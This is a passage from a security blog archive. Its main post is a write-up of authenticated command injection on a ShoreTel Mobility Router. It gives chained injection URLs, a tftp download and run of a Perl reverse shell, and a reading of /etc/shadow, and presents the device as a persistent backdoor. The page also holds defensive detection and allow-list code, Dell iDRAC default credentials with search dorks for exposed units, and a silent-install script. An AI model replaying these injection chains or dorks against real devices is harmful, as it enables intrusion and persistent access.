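    r'200 - "-" "Player/1.0 (#beta \"x\")" 12',
    # Constructed: not a log line at all.
    'not a log line',
]

if __name__ == "__main__":
    good, bad = convert_lines(SAMPLE_LINES)
    print("\n".join(good))
    print("rejected line numbers:", bad)
```
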
That's it, kids. Hope this helps you out.<br />
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7776905799486744720.post-48294303231646895522013-02-13T08:04:00.000-10:002013-02-13T08:05:39.386-10:00<br />
Command Execution on Shoretel Mobility Router:II<br />
<br />
Well, things didn't quite go the way I expected. Success was still had. But, in my mind it was a much lesser victory. I managed to get shell, capture, and reveal the root password, which I will be sharing with you here since I'm 99.999% sure it's the same on all the Shoretel Mobility Routers, but let's start where we left off.<br />
<br />
Last we left our hero....<br />
I had managed to find a command injection vulnerability by manipulating a post to the Commands page in the Troubleshooting area on the mobility router.<br />
<br />
Now began my quest to find a writable directory, or file, so that I could upload a file to get a shell.<br />
<br />
Well as it turns out, as the Apache user, you can't write anywhere. Even the places it says you SHOULD be able to write to, you can't. The file system is in a permanent read only state in all the places that the Apache user has rights to.<br />
<br />
So, I output a directory listing with permissions (ls -laR /) and started poring over it looking for every place that Apache had write and execute permissions. All the places that existed were in the Read Only filesystem area.<br />
<br />
I'd like to take a moment here and point out that Linux file system layout and permissions are not my specialty. I believe I have a fairly firm grip on how to read them for misconfiguration but it's just not something I've spent a lot of time doing. I did the best I could, I may have missed something, I don't know. I'm working on sanitizing the directory listing I have so that I can post it somewhere and people with a better understanding can take a look over it and see if I missed something, should they so desire.<br />
<br />
So I sat back in my chair after attempting to echo 1 > test.txt in all the directories I could. I looked about for files that I could modify that I might be able to run as a more privileged user, I found none.<br />
<br />
Then I looked back at the troubleshooting page and saw this:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2UP-bYBvo8KQJ6g33vZ4Wk0biJF6vvVfEloRkz11rdH38VcuUg2j1TmuRDLAcnGCsfTvhw6IbETTRhsGGYoGIanZMPNKtYPoLNbSO1r1SlxjZ4fCd745wVcsJOhI3VDl4qrvu1UTtiq8/s1600/packet.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="243" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2UP-bYBvo8KQJ6g33vZ4Wk0biJF6vvVfEloRkz11rdH38VcuUg2j1TmuRDLAcnGCsfTvhw6IbETTRhsGGYoGIanZMPNKtYPoLNbSO1r1SlxjZ4fCd745wVcsJOhI3VDl4qrvu1UTtiq8/s400/packet.bmp" width="400" /></a></div>
Packet Capture.<br />
Capturing packets usually requires that you have elevated permissions.<br />
<br />
As luck would have it you can chain commands on this page too, although much simpler.<br />
<br />
I set it to capture on any interface 1 packet of ICMP and output it to the browser. It pops up another page with the whole command in the address bar.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoxusQIitZzQVXFwi7eTLhopWQuHcBQTZbK_Gbg_wyT-6_i5Tp9g1YgSkXeEmCxdrtRJttpV5Kq_fXErpTHB_omP9-J1AlRoaX4wRniiWkkQOKB2RzvbjdNztz5DxZeJrfmb1HoyYm2Xo/s1600/addybar.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="30" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoxusQIitZzQVXFwi7eTLhopWQuHcBQTZbK_Gbg_wyT-6_i5Tp9g1YgSkXeEmCxdrtRJttpV5Kq_fXErpTHB_omP9-J1AlRoaX4wRniiWkkQOKB2RzvbjdNztz5DxZeJrfmb1HoyYm2Xo/s640/addybar.bmp" width="640" /></a></div>
Let's clean that up a bit<br />
<br />
https://hostaname/scripts/stream/tcp-dump?-vv -n -i any -sO -c 1 icmp<br />
<br />
I know tcp-dump, and that sure looks like a native command there. Let's see if we can see who we are:<br />
<br />
I added a && whoami to the end of the address and there at the bottom it returned: <br />
(https://hostaname/scripts/stream/tcp-dump?-vv -n -i any -sO -c 1 icmp && whoami)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhx2JO3eK25Q6k8JQVnOldYkX-mtGMLRcxICJPfREla9Ahw7nCVWEq3gmab-LPV3VdcNoZz37KgvVJ9-uZc7NAXS24JsJvN2Rs6R25bYgr7zstBj0l9Zb2I1JIR7-Imrho9wXURPCkynFM/s1600/admin.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="66" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhx2JO3eK25Q6k8JQVnOldYkX-mtGMLRcxICJPfREla9Ahw7nCVWEq3gmab-LPV3VdcNoZz37KgvVJ9-uZc7NAXS24JsJvN2Rs6R25bYgr7zstBj0l9Zb2I1JIR7-Imrho9wXURPCkynFM/s640/admin.bmp" width="640" /></a></div>
<br />
admin <br />
<br />
This brings about a change, I'm a privileged user, that's nice.<br />
<br />
Admin has read write execute ALL OVER the place.<br />
<br />
But still I was dogged by the Read Only filesystem deal. Even in directories where I had full permissions I still could not write to a file. I spent a while looking for a writable directory.<br />
<br />
Then I thought about the /tmp directory. Not much use in a tmp directory if you can't write to it. <br />
<br />
I added a && echo 1 > /var/root/tmp/text.txt && ls -la /var/root/tmp<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0V6XvftVUaaVYb79asid-W0D7nmLsv7e-zW7qNxxrxUPKydvdVayN5Vlw7cKZAk7I9zt1ae7V5SZBSXqh0iExVSoKw0TNHtGnqmg0MsqHUNWgKaTTWAG6J5RmQVc1iQQSMuVlGgUkRek/s1600/test.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="198" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0V6XvftVUaaVYb79asid-W0D7nmLsv7e-zW7qNxxrxUPKydvdVayN5Vlw7cKZAk7I9zt1ae7V5SZBSXqh0iExVSoKw0TNHtGnqmg0MsqHUNWgKaTTWAG6J5RmQVc1iQQSMuVlGgUkRek/s640/test.bmp" width="640" /></a></div>
Sweet tap dancing tuna fish, test.txt. Finally, a writable directory.<br />
<br />
I had noticed earlier that Perl is installed, so I figured that a Perl shell would probably be the easiest way to go.<br />
I set up a TFTP server and put a Perl shell I've used a few times before on it.<br />
<br />
Then I went back to the web interface and entered<br />
<br />
&& cd /var/root/tmp && tftp hostname -c get plshell.pl && chmod +x /var/root/tmp/plshell.pl<br />
<br />
*why the tftp -c? I have no idea, this particular implementation of TFTP client wanted a -c for the command. I've never had to use it before. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7TXXZXhbl6Uj4KgdWCOWaaxyDcMkRsuCdC7GpQAADNwewZDiLNQrmk8viuXySxN6VdYpzk_0FeOKR0gx8vlQ-G8UnnxpSA2DvC9nBZc3cvsOh8idgZ0-C7iZdGcKNAvmv87FcDqP039I/s1600/executiveperl.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="196" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7TXXZXhbl6Uj4KgdWCOWaaxyDcMkRsuCdC7GpQAADNwewZDiLNQrmk8viuXySxN6VdYpzk_0FeOKR0gx8vlQ-G8UnnxpSA2DvC9nBZc3cvsOh8idgZ0-C7iZdGcKNAvmv87FcDqP039I/s640/executiveperl.bmp" width="640" /></a></div>
The perl shell can be found here: http://pentestmonkey.net/tools/web-shells/perl-reverse-shell<br />
Thanks pentestmonkey, your pentest cheatsheet has saved my bacon a few times. <br />
<br />
Now we execute it and voilà!<br />
(https://hostaname/scripts/stream/tcp-dump?-vv -n -i any -sO -c 1 icmp && /var/root/tmp/plshell.pl) <br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWeTG_ZC4R3JnBtz2GmGwz_gYhQpqpzzgryWG8fsTfDG2ATCoqkYeRldLpTjkXPtwfGz5f3YztLYzVzt9NU5oav1LvNskgbx9hTrWAdwJyYE74hIhGtc7D1Hj35yQc92yV6JaZVBI0xiE/s1600/victory.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWeTG_ZC4R3JnBtz2GmGwz_gYhQpqpzzgryWG8fsTfDG2ATCoqkYeRldLpTjkXPtwfGz5f3YztLYzVzt9NU5oav1LvNskgbx9hTrWAdwJyYE74hIhGtc7D1Hj35yQc92yV6JaZVBI0xiE/s640/victory.bmp" width="640" /></a></div>
<br />
We have shell.<br />
<br />
And that's pretty much that. The admin user has the same permissions as the root user. Since we were executing commands as the admin user instead of Apache we didn't have to find any privilege escalation exploits or kernel vulnerabilities. Kind of takes the fun out of it when you already have all the rights you need.<br />
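Because the capture page puts the whole option string in the URL, chained requests like the ones above end up in the web server's access log. The following is an added example, not code from this post or from the vendor: it scans access-log lines for requests to the tcp-dump path whose decoded query contains shell control characters. The Apache combined log format is an assumption and the sample log lines are constructed.<br />

```python
import re
from urllib.parse import unquote

# Apache "combined" access-log layout is an assumption; adapt to the real format.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Path taken from the URL quoted in the post.
WATCHED_PATH = "/scripts/stream/tcp-dump"

# Shell control characters. A capture filter can legitimately contain & < > |,
# so a hit is a lead for review, not proof of abuse.
SHELL_META = re.compile(r"[;&|`<>\r\n]|\$[({]")

# Constructed sample lines (documentation addresses, made-up sizes and agents).
SAMPLE_LOG = [
    '192.0.2.10 - admin [20/Feb/2013:04:40:01 -1000] "GET /scripts/stream/tcp-dump'
    '?-vv%20-n%20-i%20any%20-sO%20-c%201%20icmp HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '192.0.2.10 - admin [20/Feb/2013:04:41:17 -1000] "GET /scripts/stream/tcp-dump'
    '?-vv%20-n%20-i%20any%20-sO%20-c%201%20icmp%20&&%20whoami HTTP/1.1" 200 640 "-" "Mozilla/5.0"',
    '192.0.2.10 - admin [20/Feb/2013:04:42:03 -1000] "GET /scripts/stream/tcp-dump'
    '?-vv%20-n%20-i%20any%20-sO%20-c%201%20icmp%20%26%26%20whoami HTTP/1.1" 200 640 "-" "Mozilla/5.0"',
    '192.0.2.10 - admin [20/Feb/2013:04:43:29 -1000] "GET /scripts/stream/tcp-dump'
    '?-vv%20-n%20-i%20any%20-sO%20-c%201%20icmp%2520%2526%2526%2520whoami HTTP/1.1" 200 640 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [20/Feb/2013:04:44:00 -1000] "GET /index.html?a=1&b=2 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]


def decode_query(raw, max_rounds=3):
    """Percent-decode repeatedly so %26 and %2526 both surface as '&'."""
    for _ in range(max_rounds):
        decoded = unquote(raw)
        if decoded == raw:
            break
        raw = decoded
    return raw


def scan(lines):
    """Return one finding per request to WATCHED_PATH carrying shell metacharacters."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = LOG_RE.match(line)
        if match is None:
            continue  # not a line in the assumed format
        path, _, query = match.group("target").partition("?")
        if path != WATCHED_PATH:
            continue
        options = decode_query(query)
        hits = sorted(set(SHELL_META.findall(options)))
        if hits:
            findings.append({
                "line": number,
                "client": match.group("client"),
                "user": match.group("user"),
                "time": match.group("time"),
                "options": options,
                "hits": hits,
            })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print("line {line}: {client} ({user}) at {time}: {hits} in {options!r}".format(**finding))
```
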
<br />
<u><b>The Root Password</b></u><br />
<br />
And now the moment I spent a bunch of time waiting for, the ever beloved cat /etc/shadow and seeing the root hash, that beautiful juicy root hash, just sitting there, waiting to be cracked, to have its secret revealed, to be removed from the shadows and thrust into the light of knowledge and understanding..........<br />
<br />
root:!!:10000:0:99999:7:::<br />
<br />
F*CK YOU!!! Really? A blank freaking password?<br />
<br />
This made me sad, all the work and I didn't even get to crack a hash.<br />
<br />
Well you can't win them all I guess.<br />
<br />
<br />
So.. this leaves me in a situation that I don't really like. All I've accomplished is to take the privileges I had, and use them to get a different means to access a device I already had access to. While it is handy to have an actual shell to access the device instead of just a web interface and terminal program that you access when you SSH in, I still feel pretty cheated about the whole deal. In the short run I've accomplished what I set out to do, I found a way to load a backdoor onto the system.<br />
<br />
However, let's face it, you have to have the admin user credentials to log into the device, there's not much cool stuff happening here.<br />
<br />
Now I start my search for a means of unauthenticated access to the device. Perhaps there's a way to steal a session cookie by writing some kind of xss deal into the log files. Maybe they send the authentication cookie in the clear and I can snag it with a sniffer. Maybe they're still running a vulnerable version of SSL or Apache server or FTP, I doubt it, but just maybe. Perhaps there's still yet some other way to compromise this device.<br />
<br />
The fight is over, but the battle rages on.<br />
<br />
<br />
<u><b>Command Execution on Shoretel Mobility Router</b></u> (posted 2013-01-24, updated 2013-02-20)<br />
<br />
UPDATE: Part 2 of this is located <a href="http://blakhal0.blogspot.com/2013/02/command-execution-on-shoretel-mobility.html" target="_blank">here</a> <br />
<br />
<br />
**This post is still a work in progress, only command execution as a limited user has been accomplished** <br />
<br />
At the moment this isn't all that impressive, sorry to anyone looking for 1337 sploitz.<br />
<br />
Requires auth, runs as a limited user (apache).<br />
<br />
One of the reasons this device piqued my interest is the way it's designed to run: it's intended to sit with one interface on the DMZ and another interface on the internal network. That's a gold mine, as it lives in both worlds. The downside is that you have to start on the inside to get to the config interface, and you need the credentials to log into it. So this would be a post-initial-infiltration, setting-up-persistent-access type of thing. Plus no one is going to audit this machine, as you don't get the root credentials when you buy it, so it's about the most perfect device to set up as a persistent access point.<br />
<br />
I recently had the opportunity to experiment with Shoretel's Mobility Router. While I was watching the demonstrator demo the unit I saw this page:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDCR_l2Mc9Pn2cZvP1Gphy9KP3P8Z_AIjXFeiMukQ3ulgy5MeQgafUkR2-ymXM3LJQkYPCCR0rJ6bXkcoJPj_Z0gf7V57X3uXfWrdFh-X8W7mbC1Css_jxvwSxIROvUvz2_bGl0ohGfhI/s1600/beginning.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="446" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDCR_l2Mc9Pn2cZvP1Gphy9KP3P8Z_AIjXFeiMukQ3ulgy5MeQgafUkR2-ymXM3LJQkYPCCR0rJ6bXkcoJPj_Z0gf7V57X3uXfWrdFh-X8W7mbC1Css_jxvwSxIROvUvz2_bGl0ohGfhI/s640/beginning.bmp" width="640" /></a></div>
<br />
When I saw that it had the option to run some commands from the web interface I was very hopeful that this could be a command chaining vulnerability.<br />
<br />
If I can define part of the command perhaps I can tag some extra stuff on the end and execute my own commands. Maybe I can add "; whoami" or "&& whoami" to the end and have the system execute this command instead of just ping:<br />
ping $host ; whoami<br />
This would ping the host, then as long as it was successful it would also execute whoami. <br />
or<br />
ping $host && whoami <br />
This would ping the host and do a whoami.<br />
<br />
Initially this didn't work, as the site filters out every character that isn't alphanumeric. That includes the space character. So I couldn't type in " ; whoami" or "&& whoami". I also couldn't use %XX because the % character is not allowed. So I couldn't type what I wanted into the field; I could only put in letters and digits, no spaces, no special characters.<br />
<br />
My next step was to see if the filters were on the webpage and the back end or just the web page.<br />
<br />
So I turned on the Tamper Data plugin and set to work to figure it out.<br />
<br />
I put 127.0.0.1 in the host field, hit submit, and this is what I saw:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrfVUAWTfRARUIjiJfoUuEzHJWBCfq3LjzXFynbkLF68fJ5Xi2mdIYx16JnoSQzNKYepCTcdzFqQxLcYvpeCdKLInUqL8jWbrblFLECl7ZbeY_H8misjZH9Ce6pmTSwBJFB2Tv7xTVeZo/s1600/tamper.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrfVUAWTfRARUIjiJfoUuEzHJWBCfq3LjzXFynbkLF68fJ5Xi2mdIYx16JnoSQzNKYepCTcdzFqQxLcYvpeCdKLInUqL8jWbrblFLECl7ZbeY_H8misjZH9Ce6pmTSwBJFB2Tv7xTVeZo/s1600/tamper.bmp" /></a></div>
<br />
There in the post data I see the data I entered into the fields and the command.<br />
<br />
As luck would have it they rely completely on the webpage to filter all
input. So while I may not be able to type what I want into the field I
can tamper with what actually gets sent to the system with a web proxy
and put my commands in there. <br />
<br />
After a few trial and error attempts at modifying the field data sent to the ping command I realize something.<br />
Whoa, wait a minute, it has an option to choose the command, let's see if this is limited to the options on the page.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiobOxdrjtuN4p1u2y7AFAYm7_u3SXAND9A_-S9MSIGcFyPvDyw9EBPz4ekoRopN_3WFrK_iinm0tkRsVpK7MZUckayiMckJSlkeRanIQSUf7Pt_cHwk4qFsRjyLsJ4MP3JkEfW9gbjNvg/s1600/tampered.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiobOxdrjtuN4p1u2y7AFAYm7_u3SXAND9A_-S9MSIGcFyPvDyw9EBPz4ekoRopN_3WFrK_iinm0tkRsVpK7MZUckayiMckJSlkeRanIQSUf7Pt_cHwk4qFsRjyLsJ4MP3JkEfW9gbjNvg/s1600/tampered.bmp" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
So I get rid of everything and just put in command=whoami </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
This is what pops up on the webpage when I hit submit from Tamper Data: </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFgtf122bXjE5D98-aLAbBSnVVtFRn7HbwhdCgBjSGfrzpkKkuNuQOi_W99GkqhW6cwRhVikkCqztMAyBm8-D-q7Q_OZCsMlLr6xTvWNeVoCmg8brj179_qmAQDltebo0FtXRyqLIAvA8/s1600/answer.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFgtf122bXjE5D98-aLAbBSnVVtFRn7HbwhdCgBjSGfrzpkKkuNuQOi_W99GkqhW6cwRhVikkCqztMAyBm8-D-q7Q_OZCsMlLr6xTvWNeVoCmg8brj179_qmAQDltebo0FtXRyqLIAvA8/s1600/answer.bmp" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Now this is looking promising. I'm running as the apache user but I can execute commands outside of the available set in the drop down list.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Let's try a directory listing:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEja3XdsibTXkfMtJnhtLK-fAyDGOuJl7Jt8QyXZO6YdKcA9iXiLRYn9_Fcl48rnfWRwfypo20d4ptb328OCGg8rxUoxUEQzWPbRwhz0OBcdAGFqZY6uNaoJZu9gJ3Xc4z3vFOY3N5LEvfg/s1600/ls-l.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEja3XdsibTXkfMtJnhtLK-fAyDGOuJl7Jt8QyXZO6YdKcA9iXiLRYn9_Fcl48rnfWRwfypo20d4ptb328OCGg8rxUoxUEQzWPbRwhz0OBcdAGFqZY6uNaoJZu9gJ3Xc4z3vFOY3N5LEvfg/s640/ls-l.bmp" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
You have to encode any space characters but it seems pretty lenient on any other special characters accepting either the character outright or the hex representation.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBjbch5T9i8HQJqDZrQVhS_5sogLHEPjU4PIt4vK881WAGkYpattANAOmtAL_IyQAsq42MmIbZ8OtcablzkeN9VR4c2GfHfY4L4hwajGUvhGAUM5TAlwmBV47MoGz-Ba0_roHrofr1-j0/s1600/ls-l-answer.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBjbch5T9i8HQJqDZrQVhS_5sogLHEPjU4PIt4vK881WAGkYpattANAOmtAL_IyQAsq42MmIbZ8OtcablzkeN9VR4c2GfHfY4L4hwajGUvhGAUM5TAlwmBV47MoGz-Ba0_roHrofr1-j0/s1600/ls-l-answer.bmp" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
So the theory is sound, I've found a way to issue commands directly to the system, albeit with a limited user. </div>
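The root cause described above is that filtering happens only in the browser, so the server runs whatever command and field values arrive in the POST. The following is an added example, not the vendor's code or code from this post: a server-side handler that treats the command value as a key into a fixed allow-list, validates the host, and runs the result without a shell. The host field name, the traceroute entry and the binary paths are assumptions; command is the parameter name shown in the post.<br />

```python
import ipaddress
import re
import subprocess

# Server-side allow-list: the form value selects an entry, it is never executed itself.
# "ping" is the command named in the post; "traceroute" and both paths are assumptions.
ALLOWED_COMMANDS = {
    "ping": ["/bin/ping", "-c", "4"],
    "traceroute": ["/usr/bin/traceroute", "-n"],
}

# One DNS label: starts and ends with a letter or digit, so a value such as
# "-f" can never be mistaken for an option by the called program.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(_LABEL + r"(?:\." + _LABEL + r")*")


def naive_command_line(form):
    """String a handler that trusts browser-side filtering would pass to a shell.

    Assumed shape, consistent with the behaviour the post observed. It is here
    only for contrast with build_argv() and is never executed.
    """
    parts = (form.get("command", ""), form.get("host", ""))
    return " ".join(p for p in parts if p)


def validate_host(value):
    """Accept an IP address or a hostname; reject everything else."""
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        pass
    if len(value) <= 253 and HOSTNAME_RE.fullmatch(value):
        return value
    raise ValueError("host must be an IP address or a hostname")


def build_argv(command, host):
    """Map validated form input to an argument vector, or raise ValueError."""
    if command not in ALLOWED_COMMANDS:
        raise ValueError("command is not on the allow-list")
    return ALLOWED_COMMANDS[command] + [validate_host(host)]


def run_diagnostic(form):
    """Run the diagnostic with a list argv: no shell ever parses the input."""
    argv = build_argv(form.get("command", ""), form.get("host", ""))
    result = subprocess.run(argv, capture_output=True, text=True,
                            timeout=30, check=False)
    return result.stdout


if __name__ == "__main__":
    # Constructed submissions: one as the form intends, two tampered in transit.
    submissions = [
        {"command": "ping", "host": "127.0.0.1"},
        {"command": "ping", "host": "127.0.0.1 && whoami"},
        {"command": "whoami"},
    ]
    for form in submissions:
        try:
            verdict = "accepted as {}".format(
                build_argv(form.get("command", ""), form.get("host", "")))
        except ValueError as err:
            verdict = "rejected ({})".format(err)
        print("{!r} -> {}".format(naive_command_line(form), verdict))
```
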
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Next step is to find a directory we can write to and try to upload something to get us a shell.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
* While it is possible to SSH into the machine, you're not able to SSH in as root, because you don't know the password. When you SSH in as the admin user you're automatically dumped into a configuration program and you're not able to interact with the OS directly.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
That's all for now.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Next episode, getting shell and the path to root.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
UPDATE: Part 2 of this is located <a href="http://blakhal0.blogspot.com/2013/02/command-execution-on-shoretel-mobility.html" target="_blank">here</a> </div>
<br />
<u><b>Silent Install Of Shoretel Communicator without Reboot</b></u> (posted 2012-12-12, updated 2013-05-13)<br />
<br />
Here's how to install Shoretel Communicator 12.3 silently, remotely, and without an automatic reboot.<br />
<br />
Download the communicator install from your HQ server. <br />
<br />
Please note that Communicator will not work properly until the PC has been restarted. I'll have to check into that later. I assume it just needs a service restarted.<br />
<br />
Here's the entire script I wrote up.<br />
1. We do a check to see if it's a x86 or x64 PC, we get that from the SystemInfo command.<br />
2. Then we set the appropriate path using the variable spth.<br />
<br />
DO NOT USE THE WORD "PATH" AS YOUR VARIABLE NAME<br />
It's a bad idea and it will end badly for you. I ALMOST made that mistake, but I have the good habit of re-reading a script one more time before I execute it. Saved my bacon.<br />
<br />
3. Determines if Communicator is already installed, then either forks it to the install section or the end function.<br />
<br />
The install command line to get a silent non rebooted install of communicator is as follows:<br />
<br />
setup.exe /S /v"/qn REBOOT=reallysuppress"<br />
<br />
Now, it's an InstallShield wrapper around an MSI, so the switches are split.<br />
/S and /v are for the InstallShield setup. /S is silent; /v is the variable to pass to the MSI installer.<br />
You can pass multiple variables / switches to the MSI by enclosing them in " ". Notice there is no space between the /v and the ". Spaces inside the " " are okay.<br />
<br />
Here's the script:<br />
<br />
@echo off<br />
cls<br />
REM spth holds the quoted path to Shoretel.exe for this architecture<br />
Echo Checking System Type (x86 vs x64)<br />
systeminfo | find /i "System Type" | find /i "X86-based PC"<br />
if %errorlevel% == 0 set spth="C:\Program Files\Shoreline Communications\ShoreWare Client\Shoretel.exe"<br />
systeminfo | find /i "System Type" | find /i "X64-based PC"<br />
if %errorlevel% == 0 set spth="C:\Program Files (x86)\Shoreline Communications\ShoreWare Client\Shoretel.exe"<br />
<br />
Echo Checking if Communicator is already installed.....<br />
if exist %spth% goto end1<br />
if NOT exist %spth% goto install<br />
<br />
:install<br />
echo Installing Shoretel Communicator<br />
\\fileserver\installs$\ShoreTel\setup.exe /S /v"/qn REBOOT=reallysuppress"<br />
echo Installation Finished<br />
exit<br />
<br />
:end1<br />
echo Shoretel Communicator is already installed.<br />
ping 127.0.0.1 -n 5 > nul<br />
exit<br />
<br />
Psexec or use your favorite method of pushing out an install and you're golden.<br />
<br />
<u><b>iDRAC in the Wild</b></u> (posted 2012-10-03, updated 2012-10-03)<br />
<br />
iDRAC is Dell's remote management feature. It comes in 2 flavors: Basic and Enterprise. Like most things it comes with a default user name and password combo (root calvin). Unfortunately it does not require you to change it before it becomes enabled. So you can have iDRAC run with the default user and pass.<br />
<br />
Well obviously that's not good.<br />
<br />
Dave Kennedy recently made a post about using this during a penetration test. <a href="https://www.trustedsec.com/september-2012/owning-dell-drac-awesome-hack/" target="_blank">Blog Post at Trusted Sec</a><br />
The scanner he wrote is the best part. <br />
<br />
With the Enterprise version you get a virtual console and the ability to load virtual media to boot from. So load up your favorite live CD, reboot, and get pwning. <br />
<br />
So I thought to myself, well I wonder if people have this default configuration but with a public address, that could cause all kinds of problems.<br />
<br />
They do, and there are many of them with the default login from the small amount of searching I've done. <br />
<br />
The biggest problem I see, aside from the obvious threat to your entire network, is that someone could launch a live CD, set up a temporary server, do whatever evil deeds need done, then reboot back to the normal boot device and all evidence is gone. What a fantastic jump point to attack some other network. Need a server for about 20 minutes to drop some files and want to make sure no evidence remains after that? iDRAC is the way to go.<br />
<br />
Google Search : intitle:"Integrated Dell Remote Access Controller 6 Enterprise" <br />
Shodan Search : 2.6.24-ami (Just one example)<br />
<br />
<br />
<br />
<u><b>DIY Under the Door (MULE) Tool</b></u> (posted 2012-09-11, updated 2012-09-12)<br />
<br />
There's been a lot of dust kicked up over this type of tool. It seems to be a coveted item for some reason. I don't get it personally but I saw it and I made one. I think I did a pretty solid job and it works perfectly.<br />
<br />
I picked up a 6' rod of 3/16th's steel at my local hardware store. That sounds like a lot but I didn't have to trim any of it.<br />
I got some string from the same store.<br />
<br />
Total Cost: about $8<br />
<br />
I just used a large pair of channel lock pliers and my hands to make all my bends. No special tools required.<br />
<br />
You have to use some caution making the bends as if you make a bend too sharp you're going to have a pretty rough time getting it straightened back out.<br />
<br />
<br />
Here it is in full glory:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
